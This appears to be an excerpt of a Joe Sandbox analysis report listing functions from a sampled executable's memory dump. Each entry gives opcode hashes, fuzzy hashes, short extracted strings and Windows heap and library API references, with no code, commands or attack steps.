                                                                                                          • Snapshot File: hcaresult_2_2_400000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: BlanketProxy
                                                                                                          • String ID:
                                                                                                          • API String ID: 3890896728-0
                                                                                                          • Opcode ID: 8c10bff20a8e8aed65d451a0f9309ae2e9a1c40bdddee781e7a4077f99872b17
                                                                                                          • Instruction ID: ed94d594bd2117d806c89197c83c39404e0237149115b004bcc3b795553b0392
                                                                                                          • Opcode Fuzzy Hash: 8c10bff20a8e8aed65d451a0f9309ae2e9a1c40bdddee781e7a4077f99872b17
                                                                                                          • Instruction Fuzzy Hash: 84F0DAB45093018FD704DF24C1A9716BBE0FF89304F00491CE4958B3A0C7759548CF82
                                                                                                          APIs
                                                                                                          • RtlFreeHeap.NTDLL(?,00000000,00000000,00411FA0), ref: 00438740
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_400000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FreeHeap
                                                                                                          • String ID:
                                                                                                          • API String ID: 3298025750-0
                                                                                                          • Opcode ID: c98e3c6c1c5d3e406042c1eac254c2d99449c441fdb6da50f35b40cfef612574
                                                                                                          • Instruction ID: b25b88e9ea7bdbb1f89850581c3ffb4b409410ec0811aa88fdf87babea11d3c6
                                                                                                          • Opcode Fuzzy Hash: c98e3c6c1c5d3e406042c1eac254c2d99449c441fdb6da50f35b40cfef612574
                                                                                                          • Instruction Fuzzy Hash: FCD0A932014422EBCA002F18BC06BCB3B54EF4A320F0708A2B0006A061C3249C818AD8
                                                                                                          APIs
                                                                                                          • RtlAllocateHeap.NTDLL(?,00000000,?,?,0041A117,00000000), ref: 00438710
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_400000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AllocateHeap
                                                                                                          • String ID:
                                                                                                          • API String ID: 1279760036-0
                                                                                                          • Opcode ID: 301484ee77c7189e8139e2f79f4fd3c60f6cf26ded677418877e97f4349c52e3
                                                                                                          • Instruction ID: 7f650c09d4f92c4d2e9c2dea1ed3a35c06b5e631d61445baefa380d687e4b5b8
                                                                                                          • Opcode Fuzzy Hash: 301484ee77c7189e8139e2f79f4fd3c60f6cf26ded677418877e97f4349c52e3
                                                                                                          • Instruction Fuzzy Hash: 63C09B31445120BFC9102B15FC0AFCB3F94DF55361F0100A5B10467071C7606C86C6DC
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_400000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: %B!D$(N3@$,J=L$@"_$$E*w,$EF$M:D<$O>^0$R.L $V2V4$Y6KH
                                                                                                          • API String ID: 0-989434418
                                                                                                          • Opcode ID: 08d5ecb659e1ecc1645d5db6a69494dc162f3c250b2ae45938d190f06ebd4042
                                                                                                          • Instruction ID: b8e7b53849075f0b5c8fb42915ac1224b2bdd734c57739fab395032b8c210db6
                                                                                                          • Opcode Fuzzy Hash: 08d5ecb659e1ecc1645d5db6a69494dc162f3c250b2ae45938d190f06ebd4042
                                                                                                          • Instruction Fuzzy Hash: 5DD1FC7060D3208BC714DF65D88122BB7F2EFE2314F549A2DE8954B3A1EB79D901C75A
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_400000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: (+5=$5`ab$5`ab$MN$O~$kl$pK$q{
                                                                                                          • API String ID: 0-703746868
                                                                                                          • Opcode ID: ebc0d979a2bb7c6e76a913110c66c05739548f11b644ccfc290ab05abd6cf70e
                                                                                                          • Instruction ID: e95a3a19861d8666fc895b8d31042dca6cd5972a112fb2dd02ec6905db7163ff
                                                                                                          • Opcode Fuzzy Hash: ebc0d979a2bb7c6e76a913110c66c05739548f11b644ccfc290ab05abd6cf70e
                                                                                                          • Instruction Fuzzy Hash: 1402227654C3118FD300DFA5D8916ABFBE2EFD6314F08882DE8D547381E2B89945CB9A
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_400000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: -X[i$7$D$O$P<?$gfff$tu
                                                                                                          • API String ID: 0-1455771666
                                                                                                          • Opcode ID: 15801b1b37ee951290fcf3f24f268a347267c4ddf2ea294502b6e9477135b93d
                                                                                                          • Instruction ID: f86d005fccabec52c28f4c5979689c87f8aec17e8d7c074fead4d4dd86c6c749
                                                                                                          • Opcode Fuzzy Hash: 15801b1b37ee951290fcf3f24f268a347267c4ddf2ea294502b6e9477135b93d
                                                                                                          • Instruction Fuzzy Hash: 6182447160C3408BD724CF24C8517ABBBE2EF96304F19896EE4C59B391D77C8946CB9A
                                                                                                          APIs
                                                                                                            • Part of subcall function 00439E70: LdrInitializeThunk.NTDLL(0043CC7B,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 00439E9E
                                                                                                          • FreeLibrary.KERNEL32(?), ref: 00419EBA
                                                                                                          • FreeLibrary.KERNEL32(?), ref: 00419F5B
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_400000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FreeLibrary$InitializeThunk
                                                                                                          • String ID: FG$CE
                                                                                                          • API String ID: 764372645-3557296681
                                                                                                          • Opcode ID: f35092a33cc0789979ebe9ffe0442ab9e9dfaf3093cef2044949eb2315b9da50
                                                                                                          • Instruction ID: 751b9072336dd476f0c8edbb4e61040a9f350fdfcd91b674c5d84effa823867d
                                                                                                          • Opcode Fuzzy Hash: f35092a33cc0789979ebe9ffe0442ab9e9dfaf3093cef2044949eb2315b9da50
                                                                                                          • Instruction Fuzzy Hash: FC92437560D3406BE7209F248C907ABBBE2ABE5304F19882EE4C587391D67CDD86C75A
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_400000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: ,Y$V,$Z[$^E$rPB$pqr
                                                                                                          • API String ID: 0-2372777551
                                                                                                          • Opcode ID: 913fdea2594e1da4b810cf9db394a3c049926d6ae93661e710300a5f79a234bc
                                                                                                          • Instruction ID: 360cfbd36ec33d51b6af844590a16ff09060c3b1c32a77853cdd739021ba3ac8
                                                                                                          • Opcode Fuzzy Hash: 913fdea2594e1da4b810cf9db394a3c049926d6ae93661e710300a5f79a234bc
                                                                                                          • Instruction Fuzzy Hash: D7E1F1B4608340DFE7209F15D88176BBBF0FB96304F50592DF589572A2D734990ACF4A
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_400000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 2)B$r(B$&B$(
                                                                                                          • API String ID: 0-1810555459
                                                                                                          • Opcode ID: 4f2308844809a7590283147f67298dd7f81f45e8c2d3365a79e187a7dc1c49d0
                                                                                                          • Instruction ID: 9563589593f9865cb13f29d004e10e0faf829b031538dc110dce0b8b15bb39a5
                                                                                                          • Opcode Fuzzy Hash: 4f2308844809a7590283147f67298dd7f81f45e8c2d3365a79e187a7dc1c49d0
                                                                                                          • Instruction Fuzzy Hash: 12320F75A04225DFDB18CF28ED507AAB3B1FB4A301F9945BCE806A7390D778AD41CB58
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_400000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: EL$GD$WO$]xyz
                                                                                                          • API String ID: 0-4149224771
                                                                                                          • Opcode ID: 07790e8268b4ef140f5444df08ebed9bb19fc2d323bf9cafdfc37f194dad796f
                                                                                                          • Instruction ID: 9a7495fd74d9295db7881ffdbfa432014b958f37bee7e95d90d6cdcd9c91334b
                                                                                                          • Opcode Fuzzy Hash: 07790e8268b4ef140f5444df08ebed9bb19fc2d323bf9cafdfc37f194dad796f
                                                                                                          • Instruction Fuzzy Hash: AFA125B19483118BD724DF28C8827ABB7F0EF81354F08991EE8D48B390E738D944C79A
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_400000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: T|B$dgX`$l.ez
                                                                                                          • API String ID: 0-868395073
                                                                                                          • Opcode ID: 1712a3355b676f828411998725e0f90a9b629ed43c952e07b05eaf22cb065d78
                                                                                                          • Instruction ID: 87c6ed98314ab04d272854ffec07c20815345828f08c88737cada0021c4b88b8
                                                                                                          • Opcode Fuzzy Hash: 1712a3355b676f828411998725e0f90a9b629ed43c952e07b05eaf22cb065d78
                                                                                                          • Instruction Fuzzy Hash: 9FA1547560C3509FD3109F28A88062FB7E6EBD6714F14893DE88597392D378ED06CB9A
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_400000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: ^D$iM$tz
                                                                                                          • API String ID: 0-1308588582
                                                                                                          • Opcode ID: 9bf6e2da4fa385771237cf762a4f9fd117a1b81d0b310441d9eb8cc303677817
                                                                                                          • Instruction ID: 6cec2f178053dfbaa55c33c692269f3138733c1bf41a8a5e1dffbfa9d16ab5cc
                                                                                                          • Opcode Fuzzy Hash: 9bf6e2da4fa385771237cf762a4f9fd117a1b81d0b310441d9eb8cc303677817
                                                                                                          • Instruction Fuzzy Hash: 0751BBB064C3409FE310CF51898066BBFE1EB86614F50896DF2D5AB352C3BC990A9B5B
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_400000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: KL
                                                                                                          • API String ID: 0-759073162
                                                                                                          • Opcode ID: 528411e470d2afa9db70664954eda8b8b0055ea339f8eec3dfe42437925f919f
                                                                                                          • Instruction ID: d17706412ea7e6b64df53950a2d407623bc6698a3bf9af60360d7121314021ab
                                                                                                          • Opcode Fuzzy Hash: 528411e470d2afa9db70664954eda8b8b0055ea339f8eec3dfe42437925f919f
                                                                                                          • Instruction Fuzzy Hash: FBC14672B043118BD714DB25D882A77B3E6EFE1314F5A842EE885873A1E778E805C75A
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_400000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: rLMN
                                                                                                          • API String ID: 0-1296146032
                                                                                                          • Opcode ID: 398a0f2d3e1c1d23b7c6520c3d68cfb8c2b6022d5b9c1086113ae940e227c2de
                                                                                                          • Instruction ID: 2876e3fa5c5fea4cdcd8359107f6886036ead6598efc9e460f40ff23830ad6b3
                                                                                                          • Opcode Fuzzy Hash: 398a0f2d3e1c1d23b7c6520c3d68cfb8c2b6022d5b9c1086113ae940e227c2de
                                                                                                          • Instruction Fuzzy Hash: D2815C72E086254BC7109E25CA4025BB7D69FC1710F1A867ECCD5BB3E5E939DC0687C9
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_400000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 4
                                                                                                          • API String ID: 0-4088798008
                                                                                                          • Opcode ID: d43090eb1eb790dcf99edd84306fabfed71062697cf21703b4617283169f80a8
                                                                                                          • Instruction ID: 4b2083256ab3a1a0e9e21fef50c66cb8c5486d342f26eeda273b5b13c4af68cc
                                                                                                          • Opcode Fuzzy Hash: d43090eb1eb790dcf99edd84306fabfed71062697cf21703b4617283169f80a8
                                                                                                          • Instruction Fuzzy Hash: B751E034A09791CFD7048F35A4A076AFBE2EB8A310F4D95ADD1D48B792CB389805DB48
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_400000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: ;~B
                                                                                                          • API String ID: 0-4262569895
                                                                                                          • Opcode ID: 642ea87153a8a3c7abee51d2da7421e409e98fd215c6f751a06a0f979853ef99
                                                                                                          • Instruction ID: 538cb129e17d69a09c87856b3a8c8df6b57b1ee5a985df3ca3184c8bef2424f6
                                                                                                          • Opcode Fuzzy Hash: 642ea87153a8a3c7abee51d2da7421e409e98fd215c6f751a06a0f979853ef99
                                                                                                          • Instruction Fuzzy Hash: 5C510176A0A620DBC310DF24D84152BB3E2EF85715F45492DE8D5A7361EB399C10CB9A
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_400000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: <<9>
                                                                                                          • API String ID: 0-2032997600
                                                                                                          • Opcode ID: 400242b7250ea6857ae17296f1bc71d46b1b7a2624dffe66e82ff335fa2fa009
                                                                                                          • Instruction ID: 453fe435397c730477111571020fa32af83de982021730ce0f75d12a03b73b55
                                                                                                          • Opcode Fuzzy Hash: 400242b7250ea6857ae17296f1bc71d46b1b7a2624dffe66e82ff335fa2fa009
                                                                                                          • Instruction Fuzzy Hash: 304114A56083E08BE3318F2994A07B7BFE1EFA7304F28585EDAC647242D2760455C75B
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_400000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InitializeThunk
                                                                                                          • String ID: cba`
                                                                                                          • API String ID: 2994545307-1926275841
                                                                                                          • Opcode ID: 9390a4e8fa3ac4350d87eb731825ce49587e53a81ed70f59367afe891bca62da
                                                                                                          • Instruction ID: 99072d10a19c65d2e344c474e3a8c7b25912beff4e5135e1856b4e4fc888a3a8
                                                                                                          • Opcode Fuzzy Hash: 9390a4e8fa3ac4350d87eb731825ce49587e53a81ed70f59367afe891bca62da
                                                                                                          • Instruction Fuzzy Hash: 1E416B75A493049BD3148F25ECC1B7FB3A5EB8C704F28113DEA8697390D2789C11C69A
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_400000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 92ea9aa079de7fb9bd51e09e57d1fcde5d50bc4bbef5ffc2488bdc77a794a51a
                                                                                                          • Instruction ID: afea596ac8bc0714b034837bae490f4d63f644dfc807740420400da5409030ce
                                                                                                          • Opcode Fuzzy Hash: 92ea9aa079de7fb9bd51e09e57d1fcde5d50bc4bbef5ffc2488bdc77a794a51a
                                                                                                          • Instruction Fuzzy Hash: 74818B7170C3918BE7248F2898D17ABBBD2EFD2350F288A2ED5D95B3C2C2795405C796
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_400000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 2bc29a7ea6cd0604e70ee0318e9536c6662704ac7003116416fa437163963bae
                                                                                                          • Instruction ID: 973b506937865c4c2e63bd915f81286600089bb7919b7fa6c5aab8a96018ecbd
                                                                                                          • Opcode Fuzzy Hash: 2bc29a7ea6cd0604e70ee0318e9536c6662704ac7003116416fa437163963bae
                                                                                                          • Instruction Fuzzy Hash: 04617A39A0C3904FC725CF2AC89096A7BE1AF95314F4882AEECD54B392D639DC45C796
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_400000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: c2fd4d3e156d30c0c2b8dc8dc78c1b6c267880f9e00ddefb7542dcc745552709
                                                                                                          • Instruction ID: cbccf7837cbb52881afaf6f19a9edc16f575d8d6587cfd46589fff812df3488c
                                                                                                          • Opcode Fuzzy Hash: c2fd4d3e156d30c0c2b8dc8dc78c1b6c267880f9e00ddefb7542dcc745552709
                                                                                                          • Instruction Fuzzy Hash: B421A237E6183047D310CD59CC4479172A6ABD9338F3E87B98864AB796C97BAC0386C4
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_400000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 75b61d89b1b76f821bdd40484b7f94d166381a3fdcbc567675e5e606dfa2e1a6
                                                                                                          • Instruction ID: 5300fe9fc91f9026743e17c6e8b2c7a0bce9359ab00608abf1de71f9c7ff90fc
                                                                                                          • Opcode Fuzzy Hash: 75b61d89b1b76f821bdd40484b7f94d166381a3fdcbc567675e5e606dfa2e1a6
                                                                                                          • Instruction Fuzzy Hash: DB118E7664D3415FD708CF21995111FBBE2EBD6658F28991DD0C5AB305C634C6078F8B
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_400000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                          • Instruction ID: 5ec5d6c59c1e94e7dbfe714b309442f25c10596a18a45ef6db2434c44a5edb13
                                                                                                          • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                          • Instruction Fuzzy Hash: 3311AC33A451D40EC3168D3C8400566BFA30AD7635F5993DAF4B8972D2D52A8E8B8759
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_400000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 6e668f0443b00a77aa73fb05eb0e6595b865b3f7c1a7071fde2abdda04867b9c
                                                                                                          • Instruction ID: 1603fbe25d9d62ac7efbf0a9bc568c13da77a8636866b7ae41a220bdf5de71ca
                                                                                                          • Opcode Fuzzy Hash: 6e668f0443b00a77aa73fb05eb0e6595b865b3f7c1a7071fde2abdda04867b9c
                                                                                                          • Instruction Fuzzy Hash: 1E01B5F2B0131247D720AE15E4C1737B3A96F41718F48443EE8489B342EB79EC44C299
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_400000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: bba0dd9bfe126a0a1007eca9b7cc56abc64e1f946ac9a55177cf0de369d43e32
                                                                                                          • Instruction ID: 521746e10946ceec52cc8fd8b278a23a38d98d1378d11ce092e4152f88e80811
                                                                                                          • Opcode Fuzzy Hash: bba0dd9bfe126a0a1007eca9b7cc56abc64e1f946ac9a55177cf0de369d43e32
                                                                                                          • Instruction Fuzzy Hash: 75F0E53064C354A7E2159B679C91B2FEDBA4FD6704F20952DF093A71C0D138A501471F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_400000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 2850f60c7fe46f9afd52298c7eb8645978ceb9fdd0edb91bd12347ee85e2a54a
                                                                                                          • Instruction ID: 7b2041dc8fdfdb9a0a4cb66638daaf23583e981a2faa632238d19c5cfd44ba2f
                                                                                                          • Opcode Fuzzy Hash: 2850f60c7fe46f9afd52298c7eb8645978ceb9fdd0edb91bd12347ee85e2a54a
                                                                                                          • Instruction Fuzzy Hash: 0DB012D6C0810046D1009F10AC81435A13C1107106F003434D009F7103E534E604415E